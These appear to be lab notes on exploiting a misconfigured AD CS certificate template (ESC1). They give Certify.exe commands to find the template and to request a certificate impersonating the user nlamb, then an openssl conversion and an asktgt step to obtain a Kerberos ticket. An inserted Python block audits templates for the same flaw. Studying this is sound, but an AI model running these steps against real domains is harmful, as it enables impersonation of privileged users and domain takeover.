Misconfigured Certificate Templates

Certify.exe find /vulnerable

Let's go through the key parts of this output.

  • This template is served by sub-ca.

  • The template is called CustomUser.

  • ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).

  • The certificate usage has Client Authentication set.

  • DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.

If a principal you control has WriteOwner, WriteDacl or WriteProperty on the template object, this could also be abused.

This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication.
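As an added defensive check (not code from the original notes), the following Python evaluates exported template attributes for the ESC1 condition set just described. It goes slightly beyond the page by also requiring that no manager approval or authorized signature gates the request, which is the full set of conditions a template must meet; the record layout and the `enroll` field are assumptions about how the AD export was flattened.

```python
# Added example (not part of the original notes): flag templates that show the
# ESC1 pattern described above. Records are assumed to be exported from the
# pKICertificateTemplate objects in AD, with the principals that hold the
# Enroll right already pulled out of the template ACL into "enroll" (assumption).

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Groups that effectively mean "any domain principal" when they hold Enroll.
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}

def esc1_conditions(template: dict) -> list[str]:
    """Return the ESC1 conditions a template meets, or [] unless all four hold."""
    found = []
    if template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("requester supplies the subject/SAN")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list allows any purpose
        found.append("usable for client authentication")
    enrollers = {p.split("\\")[-1] for p in template.get("enroll", [])}
    if enrollers & LOW_PRIV_GROUPS:
        found.append("low-privileged principals can enroll")
    approval = template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS
    if not approval and template.get("msPKI-RA-Signature", 0) == 0:
        found.append("no manager approval or authorized signature required")
    return found if len(found) == 4 else []

def audit(templates: list[dict]) -> dict[str, list[str]]:
    """Map each vulnerable template name to the conditions it satisfied."""
    return {t["name"]: c for t in templates if (c := esc1_conditions(t))}

# Constructed sample export, not real data; the first entry mirrors CustomUser above.
SAMPLE_TEMPLATES = [
    {"name": "CustomUser", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["DEV\\Domain Users", "DEV\\Domain Admins"]},
    {"name": "StandardUser", "msPKI-Certificate-Name-Flag": 0xA6000000,  # subject from AD
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["DEV\\Domain Users"]},
    {"name": "ApprovedUser", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["DEV\\Domain Users"]},
]
```

Running `audit(SAMPLE_TEMPLATES)` reports only CustomUser; the template whose subject is built from AD and the one gated by manager approval are not flagged.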

Request a certificate for nlamb

Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL.

Use the provided openssl command to convert it to PFX format.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

When prompted for an export password, enter pass123.

Convert cert.pfx into a base64-encoded string.

Use asktgt to request a TGT for the user with the certificate.
